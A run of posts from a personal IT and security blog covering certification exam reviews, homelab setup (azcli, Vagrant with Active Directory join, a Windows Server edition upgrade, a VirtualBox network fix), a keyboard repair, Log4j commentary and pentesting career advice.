Practical DevSecOps CTMP course and exam

2023-01-16 07:20:00

In early 2021 I needed to learn about DevSecOps and CI/CD and I needed it fast. A crash course if you will, into all things automation, pipelines, SAST, SCA, DAST and more. I went with PDSO's Certified DevSecOps Professional course, which included a 12h hands-on exam.

Here's my review from back then, TLDR: I learned a huge amount, their labs were great, their videos are good, their PDF was really not to my liking. 

Since then I've worked with a great team of people, team Strongbow at ${Bank}, and we've taught over a thousand engineers about PKI, about pentesting, about API security and about threat modelling. So when PDSO introduced their CTMP course (Certified Threat Modelling Professional) I jumped at the chance to formalize my understanding of the topic.

My review of the training materials is going to be very similar to that of CDP:

I took the exam yesterday and it was great, better than I expected!

For anyone looking for tips to take the CTMP exam:


kilala.nl tags: , ,

View or add comments (curr. 0)

An actual office for Unixerius

2023-01-08 19:58:00

Before and after redecoration

Way back when, over ten years ago, Dick had rented some local office space for Unixerius. He used it for storage, I don't think anyone ever did some actual work over there. So, that rental space wasn't long-lived.

After Dick's passing in 2021, I took over running Unixerius in January of 2022. One practical hitch about owning a company which I didn't care for, is having my private home address in the chamber of commerce's registry. That's why I rented a flex-desk at the now defunct Data Center Almere

Per the start of 2023 I'm now renting an actual office space again, at MAC3Park. They gave me a good deal on a 25m2 room, with eletricity and Internet-access included. And because the previous tenant had left in a hurry there was even some furniture left behind! They were going to toss it all, but I was very happy to have a big desk, decent chair and a comfy sofa!

The only downside to the room was the awfully bad paintjob a previous tenant had done. Dreary grey, with streaks, splotches, grease marks and overspray. I spent the week between Christmas and New Year's redecorating and cleaning. It's now a very, very comfortable office for work and studying!

The Ikea book case used to be in my kid's room and now holds memorabilia to past jobs, teams, colleagues and students. 


kilala.nl tags: ,

View or add comments (curr. 0)

Microsoft Natural Ergonomic 4000 keyboard: fixing non-functional key

2023-01-06 19:43:00

Keyboard membranes

I've been using Microsoft's ergonomic keyboards for close to twenty years now. I've had Comfort Curve models and Natural Ergonomic ones. The Natural Ergonomic 4000 has been my daily driver at the office for years. 

I hated it when it broke down. Or... When literally one of the keys broke down. Every single key on the keyboard worked fine, except the letter "c". It just wouldn't go. Nada. 

Thanks to user teevothis's disassembly video on YouTube, I found the four two screws I never managed to find before.

Opening her up, yes there were quite some crumbs and dust. But nothing overtly wrong. Pressing contacts on the membranes directly worked as expected, but the "c" also didn't work this way. A quick visual check of the contacts for the "c" showed no damage, nor debris interfering with the contact.

Visual inspections of the traces leading to the "c" also didn't show any clear damage.  It did show that the "c" key is at the end of a specific series of contacts, which explains why it's the only key on the whole keyboard that's malfunctioning: something is interfering with its individual trace(s).

There were a few splotches of brown on the keyboard membranes, which suggests I at one point spilled cola in my keyboard. So, I did something scary: I disassembled the actual membranes, which separate into three layers of plastic. There's the bottom layer with traces on top, a middle insulating layer and the top with traces on both sides of the plastic. 

To take the membranes apart, there are four places where the plastic was melted together which you need to carefully destroy. :D A scalpel will do fine, as long as you're very careful. 

I cleaned all three layers, on both sides each, and let'm dry. Putting things together bit by bit: Halleluyah! It worked again!

My hypothesis: some spillage from the cola had gotten into one of the layers of the membrane, shorting the trace for the "c" to its neighbor. Oddly, its neighbor wasn't affected.


kilala.nl tags: ,

View or add comments (curr. 1)

Lock your laptops: the pentest fairy strikes!

2022-12-29 19:27:00

My colleague and I have often wondered about people leaving their laptops unattended and unlocked. We've found them in offices, in restaurants and even lavatories!

This inspired me to do a co-op with my daughter, who took my character design for the #pentest fairy and put her own twist on it. We now have a stack of vinyl stickers (safely removable!) which you can slap on any abandoned hardware.

"You had a visit from the Pentest Fairy! Lock your laptop!"


kilala.nl tags: , ,

View or add comments (curr. 0)

Practicing with azcli, to build an Azure DevOps lab

2022-07-09 20:52:00

This fall I am scheduled to teach an introductory class on DevSecOps, to my Linux+ students at ITVitae. Ideally, if things work out, this will be a class that I'll teach more frequently! It's not just the cyber-security students who need to learn about DevSecOps, it's just as important (if not more) to the developers and data scientists!

Since this course is going to be hands-on, I'm prepping the tooling to configure a lab environment with students forming small teams of 2-4. I'd hate to manually set up all the Azure DevOps and Azure Portal resources for each group! So, I'm experimenting with azcli, the Azure management command line tool. 

Sure, I could probably work even more efficient with Terraform or ARM templates, but I don't have time enough on my hands to learn those from scratch. azcli is close enough to what I know already (shell scripting and JSON parsing), to get the show on the road. 

Here's a fun thing that I've learned: every time one of my commands fails, I need to go back and make sure that I didn't forget to stipulate the organization name. :D 

For example:

% az devops security group membership add --group-id "vssgp.Uy0xLTktMT....NDk0" --member-id "aad.ODU0MjMyZTAtN...0MmVk"

Value cannot be null.

Parameter name: memberDescriptor

That command was supposed to add one of the student accounts from the external AD, to one of the Azure DevOps teams I'd defined. But it keeps saying that I've left the --member-id as an empty value (which I clearly haven't).

Mulling it over and scrolling through the output for --verbose --debug, I just realized: "Wait, I have to add --org to all the previous commands! I'm forgetting it here!". 

And presto:

az devops security group membership add --group-id "vssgp.Uy0xLTktMT....NDk0" --member-id "aad.ODU0MjMyZTAtN...0MmVk" --org "https://dev.azure.com/Unixerius-learning/"

That was it!

 


kilala.nl tags: , ,

View or add comments (curr. 1)

More beta exams! ISC2 ELCC and CompTIA Linux+ 005

2022-06-29 21:28:00

At the end of 2021 I took the beta version of Comptia's XK0-005, which went live earlier this month as XK1-005. My opinions on the exam still stand: it's a solid exam with a good set of objectives. And luckily I passed. :D

Yesterday, I took part in another beta / pilot: (ISC)2's ELCC, also known as their Entry Level Cybersecurity Certification. I didn't take it to pad my own resumé, I did it to see if ELCC will make a good addition to my student's learning path. So far they've been using Microsoft's MTA Security (which is going away).

(ISC)2, most famously known for their CISSP certification, saw an opportunity in the market for an entry level security certificate. Some would call it a moneygrab... But the outcome of it, is their ELCC.

Looking at the ELCC exam objectives I have to say I like the overall curriculum: the body of knowledge covers most of the enterprise-level infosec knowledge any starter in infosec would need to know. It's very light on the technical stuff and focuses mostly on the business side, which I think is very important!

I've heard less-than-flattering reviews of (ISC)2's online training materials, meaning that I'd steer students to another source. And, having taken the exam, I have to admit that I think it's weak. 

Maybe it's because this was a beta exam, but a few topics kept on popping up in questions with the same question and expected-answer being given in slightly different wordings. With 100 questions on the test, I was expecting a bit more diversity. 

I also feel that a lot of the questions were about dry regurgitation: you learn definitions and when provided a description, you pick the right term from A, B, C or D. CompTIA's exams take a very different approach, where you're offered situations and varying approaches/solutions to choose from. 

Overall take-aways regarding ISC's entry-level cybersecurity certification:


kilala.nl tags: , ,

View or add comments (curr. 0)

Nostalgia: VMEbus and OS-9

2022-06-15 06:35:55

Recently I've been thinking back about old computing gear I used to own, or worked on in college. Nostalgia has a tendency to tint things rose, but that's okay. I get pangs of regret for getting rid of all my "antiques" (like the Televideo vt100 terminal, the 8088 IBM clone, my first own computer the Pressario CDS524) but to paraphrase the meme: "Ain't nobody got room fo' all that!"

Still, it was really cool to run RedHat 5 on the Compaq and having the Televideo hang off COM1 to act as extra screen and keyboard.

Anyway... that blog post I linked to, regarding RH5, also mentions OS-9. OS-9 was (is, thanks to NitrOS9). It was an OS ahead of its time, with true multi-user and multi-processing, with realtime processing all on at the time relatively affordable hardware. It had MacOS and Windows beat by at least a decade and Linux was but a glint in the eyes of the future.

I've been doing some learning! In that linked blog post I referred to a non-descript orange "server". Turns out, that's the wrong word to use!

In reality that was a VMEbus "crate" (probably 6U) with space for about 8-10 boards. Yes it used Arcnet to communicate with our workstations, but those also turn out to be VMEbus "crates", but more like development boxen with room for 1-2 boards in a desktop box.

Looking at pictures on the web, it's very likely that the lab ran OS-9 on MVME147 boards that were in each of the crates.

Color me surprised to learn that VMEbus and its successors are still very much in active use, in places like CERN but also in the military! But also in big medical gear, like this teardown of an Afga X-Ray machine shows.

Cool stuff! Now I wanna play with an MC68k box again. :)


kilala.nl tags: , , ,

View or add comments (curr. 1)

Comparing Linux+ objectives between XK0-004 and XK0-005

2022-05-11 17:43:00

Finally, the CompTIA Linux+ beta embargo has lifted! I can post the comparison I made of the objectives between XK-004 and 005!

In the spreadsheet, you'll see:


kilala.nl tags: ,

View or add comments (curr. 0)

Passed the CKA exam

2022-05-08 09:19:00

It's been a very long time in coming, but I finally passed my CKA (Certified Kubernetes Admin) exam yesterday. 

When I say "a long time", I mean that this path of studying started back in August 2021 right after finishing teaching group 41 at IT Vitae. Back then, I started out on the Docker learning path at KodeKloud, to get more familiar with containerization in general. I'd considered going for the DCA exam, but comparing it to CKA I reconsidered and added a lot more studytime to just hop onward to Kubernetes.

I can not say enough positive things about KodeKloud. The team has put a lot of effort into making great educational content, as well as solid lab environments. The cost-value comparison for KodeKloud is excellent! I plan on finishing their DCA content later this year, so I can then turn to RedHat's EX180 (Docker/Podman and OpenShift) exam.

Aside from KodeKloud's training materials, the practice exams at Killer.sh were great. You get two free practice exams as part of your CKA exam voucher and I earned a third run by submitting some bug reports. 

Again, the value for money at killer.sh is great: in-depth exercises, a stable testing environment and a exam setup that properly prepares you for the online CKA testing environment. 

Finally, the actual exam: registration was an okay process, signing in with the proctor went excellent and the exam itself worked fine as well. I did learn that Linux Foundation are very strict about the name put on your registration. I put in "T.F. Sluijter-Stek" because legally that is my identity, but they actually wanted "${FirstName} ${LastName}" so for me my "${DeadName} ${MaidenName}". Oh well; no biggy. The proctor was very patient while I went and updated my name on the portal. 

So to summarize: 


kilala.nl tags: , ,

View or add comments (curr. 0)

Windows Server: upgrade from ServerDataCenterEval to ServerStandard

2022-04-18 15:52:00

For those who just want the answer to the question: "How do I upgrade a Windows Server DataCenter Evaluation edition to a licensed Windows Server Standard?", here's where I got my answer. I'll provide a summary at the bottom.

---

My homelab setup has a handful of Windows Server systems, running Active Directory and my ADCS PKI system. Because the lab was always meant to just mess around and learn, I installed using evaluation versions of Windows Server.

I kept re-arming the trial license every 180 days until it ran out (slmgr /rearm, as per this article). After the max amount of renewals was reached, I re-installed and migrated the systems from Win2012 to Win2019 and continued the strategy of re-arming. 

Per this year, I decided to spring for a Microsoft Partner ActionPack.

Signing up Unixerius for the partnership took a bit of fiddling and quite some patience. Getting the ActionPack itself was a simple as transferring the €400 fee to Microsoft and away I go!

The amount of licenses and resources you get for that money is ridiculously awesome. Among the big stack of coolness, for my homelab, it includes ten Windows Server 2019 and 2022 licenses. There's also great Azure and MS365 resources, which I'm definitely putting to good use; it's a great learning experience!

---

Upon inspection of my homelab, it turns out that most of my Windows VM were installed as "Windows Server DataCenter Evaluation", simply because I wasn't aware of the difference between the Standard and DataCenter editions. Now I am. :)

It turns out that the ActionPack does not include licenses for DataCenter edition, so I needed to find a way to upgrade from the type "ServerDatacenterEval" to "ServerStandard". This great article helped me get this tricky situation fixed, because it's not completely simple.

Steps:

  1. Download the official Windows Server 2019 installation ISO from your partner center benefits dashboard.
  2. Make a snapshot or backup of your Windows server. 
  3. Login to the server with your account that has admin rights. 
  4. Start regedit.
    1. Go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion;
    2. Change CompositionEditionID to "ServerStandardEval".
    3. Change EditionID to "ServerStandardEval".
    4. Change ProductName to "Windows Server 2019 Standard".
  5. Close regeditDo not reboot.
  6. Connect the Windows Server installation ISO to the VM (or DVD drive).
  7. Start setup.exe from the DVD.
    1. Follow the installation instructions.
    2. Choose to upgrade "Windows Server 2019 Standard" and opt to use the online patches and updates.
    3. This process should allow you to retain all software, configurations and data.
  8. The whole process of upgrading and installing will take hours.
  9. Upon completion, you will need to provide your license key. Using the Settings app and the activation tool may not work. Turn to the commandline and run: dism /online /set-edition:serverstandard /productkey: /accepteula.

kilala.nl tags: ,

View or add comments (curr. 0)

Some struggles are hard to break

2022-02-18 12:27:00

When you next have 15-20 minutes and some coffee/tea/beer/etc, I'd consider this article an interesting read for anyone in DevSecOps and InfoSec.

The Six Dumbest Ideas in Computer Security - Marcus Ranum

That dates back to 2005 and reminds me that "the more things change, the more they stay the same". We still struggle with a lot of these issues today and my team at $Client literally discussed some of these last week.

Is Ranum infallible? No. Is Ranum 100% correct? No, I'm sure he's not. Is point #4 dead wrong? Yes. But it's still a nice read to make you pause and think.

And, while we're traipsing down Memory Lane, here's Schneier in 2004 bringing up product safety standards for software products.


kilala.nl tags: ,

View or add comments (curr. 0)

Took the CompTIA Project+ beta

2022-01-29 11:04:00

Back in November, CompTIA announced the upcoming Project+ v5 certification exam. My day-to-day job does not entail project management, but I was curious about the exam anyway.

It's no secret that beta-testing CompTIA exams has become a hobby of mine. Thus, I jumped at the chance to take it, when someone posted about it on Reddit. As has become tradition, I pludged the exam: i.e. I went in with zero preparation, only browsing through the exam objectives document

My impressions of Project+ PK1-005 (to become PK0-005):

Overall, I'm feeling pretty good about this update to Project+. 

Will it be a valuable certificate for your resumé? Maybe not, with bigger brand names having more recognized project management certs. But will it rank up there with something like PSM-I or PSPO-I? Or something like PRINCE2 fundamentals? Yeah, probably. 

Finally, do I think I passed? I expect I didn't: my experience and knowledge of formal project management, especially things like PRINCE2, is very meager. 


kilala.nl tags: , ,

View or add comments (curr. 0)

VirtualBox and Vagrant error: E_ACCESSDENIED (0x80070005) - Access denied

2022-01-23 09:25:00

I've been using Vagrant for a lot of my quick tests and my classes for a while now. A few weeks ago, my old Vagrantfile configurations stopped working, with Vagrant and Virtualbox throwing errors like these:

There was an error while executing `VBoxManage`, a CLI used by Vagrant for controlling VirtualBox.The command and stderr is shown below.

Command: ["hostonlyif", "ipconfig", "vboxnet0", "--ip", "192.168.33.1", "--netmask", "255.255.255.0"]

Stderr: VBoxManage: error: Code E_ACCESSDENIED (0x80070005) - Access denied (extended info not available) 

VBoxManage: error: Context: "EnableStaticIPConfig(Bstr(pszIp).raw(), Bstr(pszNetmask).raw())" at line 242 of file VBoxManageHostonly.cpp

 

Or, in a more recent version of Virtualbox:

The IP address configured for the host-only network is not within the allowed ranges. Please update the address used to be within the allowed ranges and run the command again.

 Address: 192.168.200.11

 Ranges: 192.168.56.0/21

Valid ranges can be modified in the /etc/vbox/networks.conf file.

 

A search with Google shows that a few versions ago VirtualBox introduced a new security feature: you're now only allowed to whip up NAT networks in specific preconfigured ranges. Source 1. Source 2. Source 3.

The work-arounds are do-able. 

While the prior is more correct, I like the latter since it's a quicker fix for the end-user. 

BEFORE:

stat1.vm.network "private_network", ip: "192.168.200.33"

 

AFTER:

stat1.vm.network "private_network", ip: "192.168.200.33", virtualbox__intnet: "08net"

 

 

Apparently it's enough to give Virtualbox a new, custom NAT network name. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

That one time I didn't beta-test two Mile2 exams

2022-01-22 16:00:00

Mile2 are a training company, aiming to provide vendor-neutral InfoSec training and certification exams. I've heard their name a few times, but have never taken any of their trainings. Reddit and TechExams also have little experiences posted about them.

That's why I was very curious and interested to join Mile2's beta program for their C)ISSO and C)PTE exams. These new versions are ANSI accredited (meaning they will require CPE points every three years) and have been renewed in a few other ways. Sounds like a great opportunity to give them a shot. Besides, taking beta exams is a hobby of mine.

Requesting access was a solid process, as you needed to submit a bit of a resumé to prove you'd be a valued reviewer/tester. I was approved for the program pretty swiftly, with clear instructions from their marketing team. 

I reported back to the team, with a few doubts about the sign-up process.

Half an hour later my access was revoked and I was ejected from the beta program, the team citing my "obvious distrust of their organization". Oh well.


kilala.nl tags: , ,

View or add comments (curr. 0)

Memes in corporate communications

2021-12-28 07:29:00

It's been years now, since Internet meme imagery has started showing up in corporate communications: from adverts to internal Powerpoint presentations, you've probably seem them. A quick talk at the office made me remember that classic episode of Star Trek:tNG, where the crew have a run-in with the Tamaran who speak in metaphors.

It made me realize, as linguists have been pointing out for aeons apparently, that we as global people can definitely head in the same direction. I mean, sure! My best friend Menno and myself can speak in 90s animation memes! So why not?

Here's how you could explain the current Log4j hullabaloo in meme-speak.

JNDI:       There's no way this could go wrong!
Log4j:      ORLY?
Log4j:      Yo dawg, we heard you like resolvers in your logs! So we put...

2021:       Pwning log4j hypetrain, let's go! To the moon!
Researcher: Shit's on fire yo.
InfoSec:    My hair is on fire! My hair is on fire!
Management: Let's go! In-n-out! 20 minute adventure
InfoSec:    One does not simply ...
DevOps:     Science dog has no idea what he's doing.
DevOps:     I know nothing about ... at this point I'm too afraid to ask
InfoSec:    This is fine.

2031:       Remember when? ... Pepperidge farms remembers!

 


kilala.nl tags: ,

View or add comments (curr. 0)

Explanation of the Log4j vulnerability and how we got here

2021-12-27 15:37:00

two options for resolving variables in logging

Fabian Faessler, aka LiveOverflow, runs a wonderful YouTube channel where he explains all kinds of InfoSec and other hacking related topics. I'm a huge fan of his two-part explanation of the recent Log4j vulnerability. 

We've seen plenty of proofs-of-concept and rehahshes of JNDI-problems. In his video, Fabian instead delves into the matter of how we even got into this mess.

The screenshot above is from part 2. It asks developers the honest question: what would have been better, more secure? Do we want a logging solution which can resolve arbitrary variables and macros? Or should we have a plain logger, which needs to be spoon-fed what it needs to log?

In secure design, we should always choose for option B. But I guess that historically "features" and "shiny factor" won over "basic design".

If you have half an hour, I suggest you grab some coffee and go give this series a watch!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Mike Sass' excellent infosec training retrospective

2021-12-27 11:07:00

I just found this awesome page (a very long read), which is a retrospective of Mike Sass' five-year education path. Lots of good advice about studying infosec, and mini-reviews of many trainings (SANS and others). 

https://shellsharks.com/training-retrospective


kilala.nl tags: , ,

View or add comments (curr. 0)

I sat the CFR-410 beta: CertNexus CyberSec First Responder

2021-12-27 08:37:00

A few weeks ago CertNexus announced the public beta of their CyberSec First Responder (CFR) exam, version 410. Three years ago I took the beta for CFR-310. At the time I wasn't overly impressed by the exam, so I decided to take it again to see if they improved.

They did not. I can actually literally repeat what I said three years ago, while replacing "Examity" with "OnVue".

Comparing this to CySA+, I like CompTIA's exam a lot better.

My take-away: if you're in the US and must get a DoD 8570-listed certificate for one of the CSSP roles, then you may find CFR to be easier than CompTIA's CySA+ or Pentest+.

CFR is also marginally cheaper than CySA+ ($350 vs $370). But it's the renewal fees where you may want to opt for CompTIA, if you have more than one of their certs. Both companies charge $150 per three years, but in CompTIA's case the fees for multiple certs are often combined, so you don't have to pay multiple. 

I'm curious to see what the end-result of my scoring will be. But if I do pass, I will not be paying my CFR annual fees.

EDIT:
One thing I don't like about the CFR-410 exam is this section on page 5 of the objectives document:

"The information that follows is meant to help you prepare for your certification exam. This information does not represent an exhaustive list of all the concepts and skills that you may be tested on during your exam. [...] The information beyond the domains and objectives is meant to provide examples of the types of concepts, tools, skills, and abilities that relate to the corresponding domains and objectives. All of this information [...] does not necessarily correlate one-to-one with the content covered in your training program or on your exam.

It sounds like they're saying: the exam may include specific tools and techniques not listed as examples on the objectives document. 

You could argue that's fair enough, because it's impossible to list all tools that you'll ever run into on the job. But on the other it creates a moving target for students who are already anxious enough about taking a big exam. 

With CompTIA's exam objectives you can always count on it that "if it's not on the objectives, it's not on the exam". 


kilala.nl tags: , ,

View or add comments (curr. 0)

On the "why" of package managers

2021-12-24 09:43:00

On the CompTIA A+ Discord we got into a little chat about apt package management. Someone really wanted a real-world example. Since "apt install wireshark" doesn't really tell them much, I typed up the following. 

What we haven't been hitting on here and which might not come up in the objectives either is "why?". Why do we even need yum, apt, brew, choco, dnf and so on?

To answer that in as short a time as possible: installing software can be a tricky thing, because of "dependencies". Software needs more software, which needs more software, to run. 

A piece of software is almost never stand-alone: it needs libraries, drivers, programming language interpreters, supporting tools and so on. And if you start working with Python, Java, NodeJS and so on, you will really get stuck in "dependency hell". 

On Windows, standalone software installs often come as MSI or EXE installer. On Linux they come in the form of DPKG, RPM and other package formats. Now, if you want to run software that was installed via only such an installer, you'll quickly run into problems "Help! I'm missing X, Y and Z! You need to install those too!"

Package managers like Yum, APT, Homebrew, Chocolatey and so on help us with that. They will look at the list of dependencies that such an RPM / DPKG might have and make a grocery list. :) "You want this? Fine, then we'll also get X, Y and Z and get'm setup for you."

That's the "WHY?". It makes sudo apt install wireshark so nice, because it'll fetch ALL the extras Wireshark needs to run. For example. 

Now Overwatch? That's gonna be interesting. Because where do all these packages come from? From "repositories", central databases of software packages. They are often run by the company making your chosen Linux, but there's also independent ones (like choco, brew and more). Plus, commercial vendors also often have their own repositories setup which you can subscribe to. This is how you would install Microsoft's Gitlab, for example. 

Question is: do Blizzard have a repo to install Overwatch from? I don't know. :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

Another month, another beta: CertNexus CFR-410 and Project+

2021-12-22 16:16:00

Back in 2018, I took the CertNexus CFR-310 beta exam. It was okay. 

This week I learned that CN are launching CFR-410 with another beta (quoting their Facebook):

"Due to the high demand for the CFR-410 beta testers, we have decided to offer 75% off the voucher for the CFR-410 beta exam for a limited time. To participate, please go to https://bit.ly/CFR-410-voucher, create an account (or sign in), add the exam voucher to your cart and enter coupon code CFRBETA75 during checkout.

For more information on #CFR go to https://certnexus.com/certifica.../cybersec-first-responder/."

Final cost after discount: USD 87.50. I booked it and am waiting for the beta to open up. 

As a reminder, CFR-410 (and 310) are a security incident response exam, the acronym referring to CyberSec First Responder. It's comparable to CompTIA's CySA+ (cybersec security analyst) and the much better GCIH (GIAC incident handler). I'm curious how this'll play out!

Speaking of other upcoming betas: Project+ 005 from CompTIA is coming up. And yes, they will run a beta exam, starting in January. I might be curious enough to just give it a shot, see what it's about. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Took the CompTIA XK0-005 Linux+ beta

2021-12-05 09:09:00

Less than 48h ago, the new beta version of CompTIA's Linux+ exam, XK0-005, was opened to the general public. Or is it XK1-005?! I've asked them what's up with that XK0/XK1. Since taking CompTIA's beta exams is a big hobby of mine, I jumped onboard immediately!

Three years ago I was not very impressed by the XK0-004 beta. I felt it was too easy and too heavily focused on git and legacy software like init. Since there's an embargo on the objectives (which you can download from the official page I linked above) I can't discuss the objectives nor what's on the test. But I can tell you this much:

Some of the questions were really, really long. Like, "print this on A4 and it fills a whole page" long. I felt that might scare off the intended entry-level audience, so I put that in the comments. 

My conclusion: this exam is looking good! I would say that, content-wise, it's now on par with what I'd expect from RHCSA. I don't have recent experiences with LPIC or LFCS, I should give those a look sometime soon. 

I expect that my next group of students at IT Vitae will still be testing against version 004, but I will start updating my training materials for the next groups. The objectives have changed thoroughly. 


kilala.nl tags: , ,

View or add comments (curr. 0)

I still don't regret switching to MacOS

2021-11-08 21:37:00

It has been almost exactly 18 years since I switched to MacOS, coming from Windows and Linux. November 2003! When the Powermac G5 was the hottest thing (literally). 

MacOS 10.3 was ready to drop and I was giddy about that beautiful, heavy cheesegrater under my desk. 

Why bring this up now? Because I just realized that the three laptops I'm using have all been great for us! Thee Macbooks Air, two from 2014 and one from 2017. All with 8GB of RAM and the i5 CPU. And they still work perfectly fine for my daily needs! 

They run my Docker containers, my Linux VMs with VirtualBox and Vagrant, my BurpSuite and all my productivity tools. And they're still good looking, light and quiet. That was money well spent!


kilala.nl tags: , ,

View or add comments (curr. 0)

I tested CompTIA Server+ and it wasn't great

2021-10-29 09:21:00

I just passed CompTIA's Server+ exam, which was a "meh" experience. 

The exam crashed twice on the same PBQ (literally the very first question!), but the proctors were awesome about it.

In the first crash, not even the chat tool worked, so I powered down and not 1 minute later my phone rang. The proctor was very helpful in getting me back to my exam. The second time I went back to that broken question it hung again, but luckily chat was still working so the proctor reset my connection. 

In short: the exam has solidified my opinion that the CompTIA PBQs work badly on MacOS systems. The OnVue software clearly puts stress on the system, because my fans were going wild nonstop.

Based on the Server+ exam contents (I did not read any of the books) this is not a course/exam I would recommend to anyone with over a year of data center experience. It would make a nice introduction to someone starting as DC tech or Unix/Windows admin.


kilala.nl tags: , ,

View or add comments (curr. 0)

Renewing CompTIA certification

2021-10-12 13:08:00

A question that comes up pretty frequently on Discord, is about CompTIA's renewal process. Like ISC2, ECC and SANS/GIAC, CompTIA also have a program that works with CPE/CEU (study credits). However, they're actually a bit more flexible than the others.

Here's a nice comparison of the "easiest" ways to renew.

TLDR, you either:

 

Me, I've always gone for the last option, which is silly because getting PT+, CYSA+ and CASP+ would have renewed all my certs for free. 😐 Wasted money


kilala.nl tags: , ,

View or add comments (curr. 0)

Linux+ practice resources

2021-10-10 17:23:00

Here's a list of practice resources I suggest to my Linux+ students, for Bash and Linux in general.

Special mention:

Complete newb level:

Early on, for beginners:

Advanced:


kilala.nl tags: , , ,

View or add comments (curr. 1)

Where to go after Security+

2021-10-10 11:32:00

There's a question which commonly comes up on Discord. I thought I'd just make a blogpost out of my most common response.

"I need you to suggest me onto path after security+. I want to develop my pen-testing and web security skills."

Here's a great overview of all kinds of security certification tracks -> https://pauljerimy.com/security-certification-roadmap/

If you're a rookie pen-tester and need a start with the basics, then eLearnSec's eJPT was always a decent start.

Pentest+ is CompTIA's cert that tests for 1-2 years of professional experience (or bruteforce book-learning). In Paul's overview it's lower ("easier") than eJPT, which I disagree with.

For a little more experienced people, eWPT and eCPPT from eLearnSec were also decent. Or, if you want to pack a bit more oomph, go for PWK (pentesting with Kali) from Offensive Security. The capstone to PWK is the now famous OSCP practical hacking exam.

OSCP combines research skills, time management and documentation with technical challenges which are not "too hard" (their difficulty lies mostly in the huge variety offered).

There are many cool sites that offer free or affordable education through labs, like TryHackMe and HackTheBox. Personally I've been a fan of PentesterAcademy, who put out good quality content and whose courses can go really in-depth.

If you have an employer who's not afraid to spend some money on you and you still have budget left, consider the SANS trainings + GIAC exams. They're expensive, but have a good reputation and the trainings are awesome.

GSEC can be considered their next step after Security+. GCIH and GPEN are the GIAC "better-than" certs compared to CySA+ and Pentest+... Their training courses SEC504 and SEC560 are awesome... and ?

Finally I'd like to plug Antisyphon trainings

They offer very good value for money, via online trainings. Some of these are pay-what-you-can, letting you pay somewhere between $25 and $495. Others are fixed price, but well worth it.

Case in point -> Modern webapp pentesting with B.B. King.

That's $495 for 16 hours (4*4h) of online training with a group of fun students and the excellent B.B. King. It goes into a whole bunch of very important tactics and testing methods for modern web applications. Recommended!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Another season of classes done, which has left me a bit empty

2021-10-09 17:57:00

Halfway through May I started teaching Linux+ to the cyber-security "Group 41" at ITVitae. It's been 16 classes since then, nearly a hundred contact hours with a marvelous group of students.

And now, like I've had before after finishing a big project, I'm feeling a bit empty. In 2017, not a day after finishing my OSCP exam, I quickly felt empty and lost. And now that I'm officially done with "my" kids, I'm also at a loss. It feels odd, not teaching them anymore.

So. Best look to the future! Hopefully I'll teach a new group in a few months and until then I'd like to shoot for the DCA and CKA Docker/K8S exams.


kilala.nl tags: , ,

View or add comments (curr. 0)

Homebrew CMS security issues

2021-08-23 21:22:00

Back in early 2019 I first learned how to properly apply CSP to my site's code. It was a very educational learning experience and by the end of it I managed to score an A+ in Mozilla's Observatory (which does compatibility and security checks on your site). 

Imagine my surprise when earlier today I learned that A) my CSP wasn't being used anymore, the header wasn't even set and B) my Observatory score had dropped to an F! Wow, what happened?!

It turns out that Dreamhost's PHP wasn't using my .htaccess file anymore, on the PHP 7.3 setup that it was running. A switch to PHP 7.4 with their FastCGI setup and we're back in business. 

Also, hooray for the CSP Evaluator tool!

That'll teach me to regularly scan and check my own site. :|

I was prompted to go check out my own CSP settings, thanks to Scott Helme's recent post -> I turned on CSP and all I got was this crappy lawsuit


kilala.nl tags: ,

View or add comments (curr. 0)

The price our grand-children were to pay

2021-08-11 08:14:00

We need change now.

Image courtesy of UN Climate Action.

"There's a price our grand-children will have to pay."

Remember that one? About the climate? We've been saying that for so long that we forgot what it means. Well, fun's over: we are those grand-children. My generation, the twenty-somethings I teach at school, my daughter! We're all going to pay the piper, starting this decade. 

The IPCC, an international cooperation of hundreds of scientists, has recently confirmed that what they've been saying for decades is not only true, it's also happening right now. 

The full report is a whopping 1300 pages, which is too much for mere mortals such as you and me to take in. But luckily there's friendly folks who create summaries.

Or as Zentouro puts it, if you really want to panic and feel desperate, try playing with the IPCC's Interactive Atlas which shows you exactly how things will be changing on the short term.

To put it bluntly: all of us will need to pull together and start taking measures that we will not like. Forego travel-for-fun, drastically cut down meat consumption and your consumption of luxury goods overall. Bitter pills to swallow and all that. But if that means that the earth will only burn for fifty years instead of a hundred, I guess that'll be worth it. 

To make sure that it's not just us putting in the efforts, make sure to influence your local politics! It's not just the people who need to change, it's our nations and our companies.

Write to your representatives, to your congressmen, to your politicians. Refer them to the IPCC's summary for policy makers, refer them to the IPCC's FAQ on the AR6 report

It's time to get angry and to help make changes. It was time thirty years ago, but better late than never.


kilala.nl tags: ,

View or add comments (curr. 2)

Automatically integrate Vagrant-built VMs into VMWare ESXi and Active Directory

2021-08-05 15:49:00

I've been using Vagrant to build new VMs in my homelab, which saves me a boat-load of time. Afterwards I still needed to do a few manual tasks, to make sure the VMs integrate nicely into my Active Directory and my VMWare ESXi server. 

With a bit of fiddling, while setting up the Kubernetes cluster, I came to a pretty decent Vagrant provisioning script. It does the following:

The spots with ${MYUSER} and ${MYPASSWORD} are a privileged domain admin account. 


apt-get install -y open-vm-tools
systemctl enable open-vm-tools
systemctl start open-vm-tools

apt-get install -y oddjob oddjob-mkhomedir sssd sssd-tools realmd adcli \
samba-common-bin sssd-tools sssd libnss-sss libpam-sss adcli policykit-1 \
packagekit

cp /vagrant/realmd.conf /etc/realmd.conf
realm join --unattended --user ${MYUSER} corp.broehaha.nl <<< ${MYPASSWORD}

echo "sudoers: files sss" >> /etc/nsswitch.conf
cp /vagrant/sssd.conf /etc/sssd/sssd.conf

cat >> /etc/ssh/sshd_config << EOF
AllowGroups linux-login
AuthorizedKeysCommand /usr/bin/sss_ssh_authorizedkeys
AuthorizedKeysCommandUser nobody
EOF

systemctl enable sssd realmd ssh
systemctl restart sssd realmd

kilala.nl tags: , ,

View or add comments (curr. 0)

Is OSCP a good place to start pen-testing certification?

2021-08-05 07:46:00

Someone on Discord recently asked me: "Is OSCP a good first cert for someone who wants to go into pentesting?"

I thought I'd share the response I gave them. I hope it's still a valid viewpoint, what with my OSCP being a few years ago.

========================

Yes, but no.

